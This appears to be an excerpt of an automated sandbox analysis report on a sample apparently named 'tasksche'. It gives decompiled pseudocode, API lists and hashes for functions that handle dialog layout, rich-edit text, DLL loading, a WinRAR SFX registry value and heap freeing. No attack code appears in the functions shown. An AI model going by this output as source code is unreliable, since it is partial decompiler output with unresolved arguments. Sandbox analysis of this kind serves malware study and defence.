                                                                                              • Instruction ID: aa973f8903d1be904dc07ab5abbbb304e5ce1521a2ae556c165a5ca6c4136d8e
                                                                                              • Opcode Fuzzy Hash: ce92c9ddd730c79d2188c1e242c279a763945db822d6a664a738baf9c01ceca9
                                                                                              • Instruction Fuzzy Hash: 5981F2B1A002099ADB34DF64CC85BEA77A4EF10354F10417FE791B72D1DBB88A85CA9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 562 40c15c-40c1b9 call 40c075 GetWindowRect GetClientRect 565 40c258-40c261 562->565 566 40c1bf-40c1c3 562->566 567 40c2a1-40c2c0 GetSystemMetrics GetWindow 565->567 568 40c263-40c29a GetWindowTextW call 40bf1d SetWindowTextW 565->568 569 40c1c9-40c208 566->569 570 40c29c 566->570 572 40c399-40c39b 567->572 568->567 573 40c20a 569->573 574 40c20c-40c20e 569->574 570->567 578 40c3a1-40c3a5 572->578 579 40c2c5-40c2cc 572->579 573->574 576 40c210 574->576 577 40c212-40c229 GetWindowLongW 574->577 576->577 581 40c232-40c255 SetWindowPos GetWindowRect 577->581 582 40c22b 577->582 579->578 580 40c2d2-40c2eb GetWindowTextW 579->580 583 40c313-40c317 580->583 584 40c2ed-40c30d call 40bf1d SetWindowTextW 580->584 581->565 582->581 586 40c383-40c394 GetWindow 583->586 587 40c319-40c37d GetWindowRect SetWindowPos 583->587 584->583 586->578 589 40c396 586->589 587->586 589->572
                                                                                              C-Code - Quality: 69%
                                                                                              			E0040C15C(intOrPtr __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, struct HWND__* _a12) {
                                                                                              				char _v5;
                                                                                              				struct HWND__* _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				int _v24;
                                                                                              				int _v28;
                                                                                              				int _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				struct tagRECT _v52;
                                                                                              				struct tagRECT _v68;
                                                                                              				struct tagRECT _v84;
                                                                                              				short _v2132;
                                                                                              				signed int _t115;
                                                                                              				struct HWND__* _t117;
                                                                                              				signed int _t135;
                                                                                              				signed int _t159;
                                                                                              				struct HWND__* _t173;
                                                                                              				signed int _t174;
                                                                                              				int _t177;
                                                                                              				void* _t181;
                                                                                              				signed int _t182;
                                                                                              				signed int _t185;
                                                                                              				signed int _t194;
                                                                                              				void* _t196;
                                                                                              				void* _t197;
                                                                                              				void* _t200;
                                                                                              				int _t201;
                                                                                              				int _t204;
                                                                                              
                                                                                              				_v36 = __ecx;
                                                                                              				_v5 = E0040C075(__ecx, __edx, _a8,  &_v20,  &_v16);
                                                                                              				GetWindowRect(_a4,  &_v52);
                                                                                              				GetClientRect(_a4,  &_v84);
                                                                                              				_t115 = _v84.right;
                                                                                              				_t181 = _v52.right - _v52.left + 1;
                                                                                              				_t200 = _v52.bottom - _v52.top + 1;
                                                                                              				_t196 = _t200 - _v84.bottom;
                                                                                              				_t173 = _t181 - _t115;
                                                                                              				_v12 = _t173;
                                                                                              				if(_v5 == 0) {
                                                                                              					L9:
                                                                                              					_t201 = 0x400;
                                                                                              					if(_a12 == 0) {
                                                                                              						GetWindowTextW(_a4,  &_v2132, 0x400);
                                                                                              						E0040BF1D(_v36,  &_v2132,  &_v2132, 0x400, 1, _a8);
                                                                                              						SetWindowTextW(_a4,  &_v2132); // executed
                                                                                              					}
                                                                                              					L12:
                                                                                              					_t197 = _t196 - GetSystemMetrics(8);
                                                                                              					_t117 = GetWindow(_a4, 5);
                                                                                              					_a4 = _a4 & 0x00000000;
                                                                                              					_a12 = _t117;
                                                                                              					_v12 = _t117;
                                                                                              					while(_t117 != 0) {
                                                                                              						if(_a4 >= 0x200) {
                                                                                              							break;
                                                                                              						}
                                                                                              						GetWindowTextW(_a12,  &_v2132, _t201);
                                                                                              						if(_v2132 != 0) {
                                                                                              							E0040BF1D(_v36,  &_v2132,  &_v2132, _t201, 1, _a8);
                                                                                              							SetWindowTextW(_a12,  &_v2132); // executed
                                                                                              						}
                                                                                              						if(_v5 != 0) {
                                                                                              							GetWindowRect(_a12,  &_v68);
                                                                                              							_push(0x204);
                                                                                              							asm("cdq");
                                                                                              							_t182 = 0x64;
                                                                                              							_push((_v68.bottom - _v68.top + 1) * _v16 / _t182);
                                                                                              							asm("cdq");
                                                                                              							_push((_v68.right - _v68.left + 1) * _v20 / _t182);
                                                                                              							_t135 = (_v68.top - _t197 - _v52.top) * _v16;
                                                                                              							asm("cdq");
                                                                                              							_push(_t135 / _t182);
                                                                                              							asm("cdq");
                                                                                              							_t185 = 0x64;
                                                                                              							asm("cdq");
                                                                                              							SetWindowPos(_a12, 0, (_v68.left - (_t173 - _t135 % _t182 >> 1) - _v52.left) * _v20 / _t185, ??, ??, ??, ??);
                                                                                              						}
                                                                                              						_t117 = GetWindow(_a12, 2);
                                                                                              						_a12 = _t117;
                                                                                              						if(_t117 == _v12) {
                                                                                              							break;
                                                                                              						} else {
                                                                                              							_a4 = _a4 + 1;
                                                                                              							continue;
                                                                                              						}
                                                                                              					}
                                                                                              					return _t117;
                                                                                              				}
                                                                                              				if(_a12 != 0) {
                                                                                              					_t201 = 0x400;
                                                                                              					goto L12;
                                                                                              				}
                                                                                              				asm("cdq");
                                                                                              				_t174 = 0x64;
                                                                                              				_v24 = _v12 + _t115 * _v20 / _t174;
                                                                                              				_t159 = _v84.bottom * _v16;
                                                                                              				asm("cdq");
                                                                                              				_t194 = _t159 % _t174;
                                                                                              				_v28 = _t159 / _t174 + _t196;
                                                                                              				asm("cdq");
                                                                                              				_t177 = (_t181 - _v24 - _t194 >> 1) + _v52.left;
                                                                                              				asm("cdq");
                                                                                              				_t204 = (_t200 - _v28 - _t194 >> 1) + _v52.top;
                                                                                              				if(_t177 < 0) {
                                                                                              					_t177 = 0;
                                                                                              				}
                                                                                              				if(_t204 < 0) {
                                                                                              					_t204 = 0;
                                                                                              				}
                                                                                              				_v32 = 0x204;
                                                                                              				if((GetWindowLongW(_a4, 0xfffffff0) & 0x00000800) == 0) {
                                                                                              					_v32 = 0x206;
                                                                                              				}
                                                                                              				SetWindowPos(_a4, 0, _t177, _t204, _v24, _v28, _v32);
                                                                                              				GetWindowRect(_a4,  &_v52);
                                                                                              				_t173 = _v12;
                                                                                              				goto L9;
                                                                                              			}































                                                                                              0x0040c173
                                                                                              0x0040c17b
                                                                                              0x0040c185
                                                                                              0x0040c192
                                                                                              0x0040c1a4
                                                                                              0x0040c1a7
                                                                                              0x0040c1a8
                                                                                              0x0040c1ad
                                                                                              0x0040c1b0
                                                                                              0x0040c1b6
                                                                                              0x0040c1b9
                                                                                              0x0040c258
                                                                                              0x0040c25c
                                                                                              0x0040c261
                                                                                              0x0040c26e
                                                                                              0x0040c285
                                                                                              0x0040c294
                                                                                              0x0040c294
                                                                                              0x0040c2a1
                                                                                              0x0040c2ae
                                                                                              0x0040c2b0
                                                                                              0x0040c2b6
                                                                                              0x0040c2ba
                                                                                              0x0040c2bd
                                                                                              0x0040c399
                                                                                              0x0040c2cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c2dd
                                                                                              0x0040c2eb
                                                                                              0x0040c2fe
                                                                                              0x0040c30d
                                                                                              0x0040c30d
                                                                                              0x0040c317
                                                                                              0x0040c320
                                                                                              0x0040c32c
                                                                                              0x0040c336
                                                                                              0x0040c339
                                                                                              0x0040c33c
                                                                                              0x0040c348
                                                                                              0x0040c34b
                                                                                              0x0040c354
                                                                                              0x0040c358
                                                                                              0x0040c35b
                                                                                              0x0040c35e
                                                                                              0x0040c373
                                                                                              0x0040c374
                                                                                              0x0040c37d
                                                                                              0x0040c37d
                                                                                              0x0040c388
                                                                                              0x0040c38e
                                                                                              0x0040c394
                                                                                              0x00000000
                                                                                              0x0040c396
                                                                                              0x0040c396
                                                                                              0x00000000
                                                                                              0x0040c396
                                                                                              0x0040c394
                                                                                              0x0040c3a5
                                                                                              0x0040c3a5
                                                                                              0x0040c1c3
                                                                                              0x0040c29c
                                                                                              0x00000000
                                                                                              0x0040c29c
                                                                                              0x0040c1cd
                                                                                              0x0040c1d0
                                                                                              0x0040c1d6
                                                                                              0x0040c1dc
                                                                                              0x0040c1e0
                                                                                              0x0040c1e1
                                                                                              0x0040c1e5
                                                                                              0x0040c1ed
                                                                                              0x0040c1f9
                                                                                              0x0040c1fc
                                                                                              0x0040c203
                                                                                              0x0040c208
                                                                                              0x0040c20a
                                                                                              0x0040c20a
                                                                                              0x0040c20e
                                                                                              0x0040c210
                                                                                              0x0040c210
                                                                                              0x0040c217
                                                                                              0x0040c229
                                                                                              0x0040c22b
                                                                                              0x0040c22b
                                                                                              0x0040c242
                                                                                              0x0040c24f
                                                                                              0x0040c255
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 0040C075: _wcschr.LIBCMT ref: 0040C0A5
                                                                                              • GetWindowRect.USER32 ref: 0040C185
                                                                                              • GetClientRect.USER32 ref: 0040C192
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040C21E
                                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040C242
                                                                                              • GetWindowRect.USER32 ref: 0040C24F
                                                                                              • GetWindowTextW.USER32 ref: 0040C26E
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0040C294
                                                                                              • GetSystemMetrics.USER32 ref: 0040C2A3
                                                                                              • GetWindow.USER32(?,00000005), ref: 0040C2B0
                                                                                              • GetWindowTextW.USER32 ref: 0040C2DD
                                                                                              • SetWindowTextW.USER32(00000000,00000000), ref: 0040C30D
                                                                                              • GetWindowRect.USER32 ref: 0040C320
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000110,00000000,00000110,00000204), ref: 0040C37D
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0040C388
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                              • String ID:
                                                                                              • API String ID: 4134264131-0
                                                                                              • Opcode ID: 9886efa1d7aa19233dee01def18c78a05a732e10b374928cec257c7fc49daa0d
                                                                                              • Instruction ID: 46c95fab82868b9c938a6533d3e49af797eb3fa96210388a24d02bb49560b234
                                                                                              • Opcode Fuzzy Hash: 9886efa1d7aa19233dee01def18c78a05a732e10b374928cec257c7fc49daa0d
                                                                                              • Instruction Fuzzy Hash: 9A711671A00219EFDF10DFE8CC89AEEBBB9FB08314F048169FD15B61A0D774AA558B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040D298(char _a4, long _a8) {
                                                                                              				struct HWND__* _v8;
                                                                                              				char _v75;
                                                                                              				intOrPtr _v80;
                                                                                              				signed int _v92;
                                                                                              				int _v96;
                                                                                              				void* _v100;
                                                                                              				intOrPtr _t48;
                                                                                              				struct HWND__* _t49;
                                                                                              
                                                                                              				_t49 = GetDlgItem( *0x441844, 0x68);
                                                                                              				_v8 = _t49;
                                                                                              				if( *0x441848 == 0) {
                                                                                              					_t48 =  *0x438814; // 0x19fe80
                                                                                              					E0041918B(_t48);
                                                                                              					ShowWindow(_t49, 5); // executed
                                                                                              					SendMessageW(_t49, 0xb1, 0, 0xffffffff);
                                                                                              					SendMessageW(_t49, 0xc2, 0, 0x42a73c);
                                                                                              					 *0x441848 = 1;
                                                                                              				}
                                                                                              				SendMessageW(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                              				_v100 = 0x5c;
                                                                                              				SendMessageW(_v8, 0x43a, 0,  &_v100);
                                                                                              				_v75 = 0;
                                                                                              				_v96 = 1;
                                                                                              				if(_a4 != 0) {
                                                                                              					_v92 = _v92 & 0xbfffffff | 1;
                                                                                              					_v80 = 0xa0;
                                                                                              					_v96 = 0x40000001;
                                                                                              				}
                                                                                              				SendMessageW(_v8, 0x444, 1,  &_v100);
                                                                                              				SendMessageW(_v8, 0xc2, 0, _a8);
                                                                                              				SendMessageW(_v8, 0xb1, 0x5f5e100, 0x5f5e100);
                                                                                              				if(_a4 != 0) {
                                                                                              					_v92 = _v92 & 0xfffffffe | 0x40000000;
                                                                                              					SendMessageW(_v8, 0x444, 1,  &_v100);
                                                                                              				}
                                                                                              				return SendMessageW(_v8, 0xc2, 0, L"\r\n");
                                                                                              			}











                                                                                              0x0040d2bc
                                                                                              0x0040d2be
                                                                                              0x0040d2c6
                                                                                              0x0040d2c8
                                                                                              0x0040d2ce
                                                                                              0x0040d2d6
                                                                                              0x0040d2e2
                                                                                              0x0040d2f1
                                                                                              0x0040d2f3
                                                                                              0x0040d2f3
                                                                                              0x0040d305
                                                                                              0x0040d315
                                                                                              0x0040d31c
                                                                                              0x0040d325
                                                                                              0x0040d329
                                                                                              0x0040d32c
                                                                                              0x0040d339
                                                                                              0x0040d33c
                                                                                              0x0040d343
                                                                                              0x0040d343
                                                                                              0x0040d357
                                                                                              0x0040d366
                                                                                              0x0040d36e
                                                                                              0x0040d374
                                                                                              0x0040d381
                                                                                              0x0040d392
                                                                                              0x0040d392
                                                                                              0x0040d3a9

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 0040D2A9
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040D3E6,00000001,?,?,0040E2C6,0042A848,0044CF30,0044CF30,00001000), ref: 0040D2D6
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0040D2E2
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,0042A73C), ref: 0040D2F1
                                                                                              • SendMessageW.USER32(0040639B,000000B1,05F5E100,05F5E100), ref: 0040D305
                                                                                              • SendMessageW.USER32(0040639B,0000043A,00000000,?), ref: 0040D31C
                                                                                              • SendMessageW.USER32(0040639B,00000444,00000001,0000005C), ref: 0040D357
                                                                                              • SendMessageW.USER32(0040639B,000000C2,00000000,00000456), ref: 0040D366
                                                                                              • SendMessageW.USER32(0040639B,000000B1,05F5E100,05F5E100), ref: 0040D36E
                                                                                              • SendMessageW.USER32(0040639B,00000444,00000001,0000005C), ref: 0040D392
                                                                                              • SendMessageW.USER32(0040639B,000000C2,00000000,0042A810), ref: 0040D3A3
                                                                                                • Part of subcall function 0041918B: DestroyWindow.USER32(?,7490BB20,0040D2D3,?,?,?,?,?,0040D3E6,00000001,?,?,0040E2C6,0042A848,0044CF30,0044CF30), ref: 00419196
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$DestroyItemShow
                                                                                              • String ID: \
                                                                                              • API String ID: 2996232536-2967466578
                                                                                              • Opcode ID: 099f520084dbf5fca48704fc3201186082e925487be8ae0bd6b4d09b2fa327de
                                                                                              • Instruction ID: 06257c9e161764c7d53c24ae9c51dbab41789d270eb5449b748dea2bf3ac4db1
                                                                                              • Opcode Fuzzy Hash: 099f520084dbf5fca48704fc3201186082e925487be8ae0bd6b4d09b2fa327de
                                                                                              • Instruction Fuzzy Hash: C431B170E4025CBBEB219BA0CC4AFAEBFB9EB41714F10412AF500BA1E0D7B51D55DB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 25%
                                                                                              			E0041A060(signed int* __ecx) {
                                                                                              				intOrPtr _v8;
                                                                                              				char _v12;
                                                                                              				struct HINSTANCE__* _t7;
                                                                                              				struct HINSTANCE__* _t8;
                                                                                              				void* _t12;
                                                                                              				void* _t15;
                                                                                              				struct HINSTANCE__** _t16;
                                                                                              
                                                                                              				_t16 = __ecx;
                                                                                              				__ecx[1] = __ecx[1] & 0x00000000;
                                                                                              				 *__ecx =  *__ecx & 0x00000000;
                                                                                              				_t7 = LoadLibraryW(L"riched32.dll"); // executed
                                                                                              				 *_t16 = _t7;
                                                                                              				_t8 = LoadLibraryW(L"riched20.dll");
                                                                                              				_t16[1] = _t8;
                                                                                              				__imp__OleInitialize(0, _t12, _t15, __ecx, __ecx);
                                                                                              				_v12 = 8;
                                                                                              				_v8 = 0x7ff;
                                                                                              				__imp__InitCommonControlsEx( &_v12);
                                                                                              				__imp__SHGetMalloc(0x44f800); // executed
                                                                                              				return _t16;
                                                                                              			}










                                                                                              0x0041a06d
                                                                                              0x0041a06f
                                                                                              0x0041a073
                                                                                              0x0041a07b
                                                                                              0x0041a082
                                                                                              0x0041a084
                                                                                              0x0041a088
                                                                                              0x0041a08b
                                                                                              0x0041a095
                                                                                              0x0041a09c
                                                                                              0x0041a0a3
                                                                                              0x0041a0ae
                                                                                              0x0041a0b9

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNELBASE(riched32.dll,00000000,00439820,?,?,?,00410051), ref: 0041A07B
                                                                                              • LoadLibraryW.KERNEL32(riched20.dll,?,00410051), ref: 0041A084
                                                                                              • OleInitialize.OLE32(00000000), ref: 0041A08B
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 0041A0A3
                                                                                              • SHGetMalloc.SHELL32(0044F800), ref: 0041A0AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$CommonControlsInitInitializeMalloc
                                                                                              • String ID: riched20.dll$riched32.dll
                                                                                              • API String ID: 448729520-3294723617
                                                                                              • Opcode ID: 8624e4f240296107261ce0a47b5d27c571c626025523bcd3f0aeccd25934cca6
                                                                                              • Instruction ID: d62a9b991739124620cbbd73e07a01740528edc951963754c9102d88a2026b42
                                                                                              • Opcode Fuzzy Hash: 8624e4f240296107261ce0a47b5d27c571c626025523bcd3f0aeccd25934cca6
                                                                                              • Instruction Fuzzy Hash: EFF08271B00318AFD7209FA5DC0EB9ABBE8EF40766F50442DE54593250DBB8A4458BA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 600 40da8c-40daa2 call 41aaf0 603 40db11-40db13 600->603 604 40daa4-40daab 600->604 604->603 605 40daad-40dae2 call 40da4f RegCreateKeyExW 604->605 605->603 608 40dae4-40db0b call 41a7af RegSetValueExW RegCloseKey 605->608 608->603
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040DA8C(void* __esi, char* _a4) {
                                                                                              				void* _v8;
                                                                                              				int _v12;
                                                                                              				short _v4108;
                                                                                              				long _t12;
                                                                                              				long _t20;
                                                                                              				intOrPtr _t27;
                                                                                              
                                                                                              				_t12 = E0041AAF0(0x1008);
                                                                                              				if( *0x441878 != 0) {
                                                                                              					_t27 =  *0x438818; // 0x43
                                                                                              					if(_t27 != 0) {
                                                                                              						E0040DA4F( &_v4108, "C:\Windows");
                                                                                              						_t12 = RegCreateKeyExW(0x80000001, L"Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12); // executed
                                                                                              						if(_t12 == 0) {
                                                                                              							RegSetValueExW(_v8,  &_v4108, 0, 1, _a4, E0041A7AF(_a4) + _t16 + 2); // executed
                                                                                              							_t20 = RegCloseKey(_v8); // executed
                                                                                              							return _t20;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t12;
                                                                                              			}









                                                                                              0x0040da94
                                                                                              0x0040daa2
                                                                                              0x0040daa4
                                                                                              0x0040daab
                                                                                              0x0040dab9
                                                                                              0x0040dad9
                                                                                              0x0040dae2
                                                                                              0x0040db02
                                                                                              0x0040db0b
                                                                                              0x00000000
                                                                                              0x0040db0b
                                                                                              0x0040dae2
                                                                                              0x0040daab
                                                                                              0x0040db13

                                                                                              APIs
                                                                                                • Part of subcall function 0040DA4F: _wcscpy.LIBCMT ref: 0040DA54
                                                                                              • RegCreateKeyExW.KERNELBASE(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\Windows), ref: 0040DAD9
                                                                                              • _wcslen.LIBCMT ref: 0040DAE7
                                                                                              • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,?), ref: 0040DB02
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 0040DB0B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue_wcscpy_wcslen
                                                                                              • String ID: C:\Windows$Software\WinRAR SFX
                                                                                              • API String ID: 3170333323-1036045337
                                                                                              • Opcode ID: 253b5885f96daf7b7a8b4f1510ea2afe6e1404dcbc281fb2c19877bebd1cbb3e
                                                                                              • Instruction ID: c04f9cf324d6fb33717342d95d48926d42d97767c878bcc2ae640bd506731f16
                                                                                              • Opcode Fuzzy Hash: 253b5885f96daf7b7a8b4f1510ea2afe6e1404dcbc281fb2c19877bebd1cbb3e
                                                                                              • Instruction Fuzzy Hash: 7F018476A0020CBFEB21AF90DC86EDA777CEB08388F504076B60562061DA745ED99669
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 849 41a506-41a517 call 41fa9c 852 41a519-41a520 849->852 853 41a58e-41a593 call 41fae1 849->853 854 41a522-41a53a call 41efa3 call 41efd6 852->854 855 41a565 852->855 866 41a545-41a555 call 41a55c 854->866 867 41a53c-41a544 call 41f006 854->867 858 41a566-41a576 RtlFreeHeap 855->858 858->853 860 41a578-41a58d call 41edae GetLastError call 41ed6c 858->860 860->853 866->853 874 41a557-41a55a 866->874 867->866 874->858
                                                                                              C-Code - Quality: 30%
                                                                                              			E0041A506(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				intOrPtr* _t10;
                                                                                              				intOrPtr _t13;
                                                                                              				intOrPtr _t23;
                                                                                              				void* _t25;
                                                                                              
                                                                                              				_push(0xc);
                                                                                              				_push(0x42d658);
                                                                                              				_t8 = E0041FA9C(__ebx, __edi, __esi);
                                                                                              				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                              				if(_t23 == 0) {
                                                                                              					L9:
                                                                                              					return E0041FAE1(_t8);
                                                                                              				}
                                                                                              				if( *0x451420 != 3) {
                                                                                              					_push(_t23);
                                                                                              					L7:
                                                                                              					_push(0);
                                                                                              					_t8 = RtlFreeHeap( *0x44f848); // executed
                                                                                              					_t31 = _t8;
                                                                                              					if(_t8 == 0) {
                                                                                              						_t10 = E0041EDAE(_t31);
                                                                                              						 *_t10 = E0041ED6C(GetLastError());
                                                                                              					}
                                                                                              					goto L9;
                                                                                              				}
                                                                                              				E0041EFA3(__ebx, 4);
                                                                                              				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                              				_t13 = E0041EFD6(_t23);
                                                                                              				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                              				if(_t13 != 0) {
                                                                                              					_push(_t23);
                                                                                              					_push(_t13);
                                                                                              					E0041F006();
                                                                                              				}
                                                                                              				 *(_t25 - 4) = 0xfffffffe;
                                                                                              				_t8 = E0041A55C();
                                                                                              				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                              					goto L7;
                                                                                              				}
                                                                                              			}







                                                                                              0x0041a506
                                                                                              0x0041a508
                                                                                              0x0041a50d
                                                                                              0x0041a512
                                                                                              0x0041a517
                                                                                              0x0041a58e
                                                                                              0x0041a593
                                                                                              0x0041a593
                                                                                              0x0041a520
                                                                                              0x0041a565
                                                                                              0x0041a566
                                                                                              0x0041a566
                                                                                              0x0041a56e
                                                                                              0x0041a574
                                                                                              0x0041a576
                                                                                              0x0041a578
                                                                                              0x0041a58b
                                                                                              0x0041a58d
                                                                                              0x00000000
                                                                                              0x0041a576
                                                                                              0x0041a524
                                                                                              0x0041a52a
                                                                                              0x0041a52f
                                                                                              0x0041a535
                                                                                              0x0041a53a
                                                                                              0x0041a53c
                                                                                              0x0041a53d
                                                                                              0x0041a53e
                                                                                              0x0041a544
                                                                                              0x0041a545
                                                                                              0x0041a54c
                                                                                              0x0041a555
                                                                                              0x00000000
                                                                                              0x0041a557
                                                                                              0x0041a557
                                                                                              0x00000000
                                                                                              0x0041a557

                                                                                              APIs
                                                                                              • __lock.LIBCMT ref: 0041A524
                                                                                                • Part of subcall function 0041EFA3: __mtinitlocknum.LIBCMT ref: 0041EFB9
                                                                                                • Part of subcall function 0041EFA3: __amsg_exit.LIBCMT ref: 0041EFC5
                                                                                                • Part of subcall function 0041EFA3: EnterCriticalSection.KERNEL32(0041A9AB,0041A9AB,?,00425448,00000004,0042DB18,0000000C,0042133E,00000000,0041A9BA,00000000,00000000,00000000,?,0041E966,00000001), ref: 0041EFCD
                                                                                              • ___sbh_find_block.LIBCMT ref: 0041A52F
                                                                                              • ___sbh_free_block.LIBCMT ref: 0041A53E
                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,0042D658,0000000C,0041EF84,00000000,0042D930,0000000C,0041EFBE,00000000,0041A9AB,?,00425448,00000004,0042DB18,0000000C), ref: 0041A56E
                                                                                              • GetLastError.KERNEL32(?,00425448,00000004,0042DB18,0000000C,0042133E,00000000,0041A9BA,00000000,00000000,00000000,?,0041E966,00000001,00000214), ref: 0041A57F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
